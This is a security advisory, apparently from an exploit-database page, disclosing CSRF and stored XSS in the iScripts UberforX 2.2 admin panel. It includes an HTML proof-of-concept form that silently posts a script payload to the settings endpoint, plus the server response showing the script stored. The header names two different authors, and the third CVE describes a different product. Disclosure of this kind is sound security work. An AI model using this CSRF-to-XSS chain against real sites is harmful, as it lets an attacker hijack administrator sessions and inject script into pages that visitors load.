iScripts UberforX 2.2 CSRF & Stored XSS in Admin Panel

Authors:Korprit Zombie         Risk:High
 
CVE:CVE-2018-10137            0day:CSRF 

CVE:CVE-2018-10136            0day:XSS

CVE:CVE-2018-10135            0day:XSS

0day-id:0DAY-10137             Date:2018-04-17

Description

CVE-2018-10137

iScripts UberforX 2.2 has CSRF in the “manage_settings” section of the Admin Panel via the /cms?section=manage_settings&action=edit URI.

CVE-2018-10136

iScripts UberforX 2.2 has Stored XSS in the “manage_settings” section of the Admin Panel via a value field to the /cms?section=manage_settings&action=edit URI.

CVE-2018-10135

iScripts eSwap v2.4 has Reflected XSS via the “catwiseproducts.php” catid parameter in the User Panel.

POC

# Exploit title: iScripts UberforX 2.2 - CSRF & Stored XSS in Admin Panel
# Date: 16/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Software Link: https://www.iscripts.com/uberforx/
# Demo Link: https://www.demo.iscripts.com/uberforx/demo/cms
# Version: 2.2
# CVE: CVE-2018-10135 CVE-2018-10136 CVE-2018-10137
# Tested on: Windows 10 / Kali Linux
# Category: Webapps

a) Send below crafted request to logged in user who is having Root Administrator level access
 
<html>
  <!-- CSRF PoC - ManhNho -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.demo.iscripts.com/uberforx/demo/cms?section=manage_settings&action=edit&id=2" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="cms&#95;set&#95;name" value="admin&#95;copyright" />
      <input type="hidden" name="cms&#95;set&#95;value" value="&lt;script&gt;alert&#40;&apos;1&apos;&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
Website will popup alert '1'
 
Response:
 
HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 07:44:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 28359
...
</div>
<div class="footer row-fluid">
<p class="muted"><small><script>alert('1')</script></small></p>
</div>
...

Leave a Reply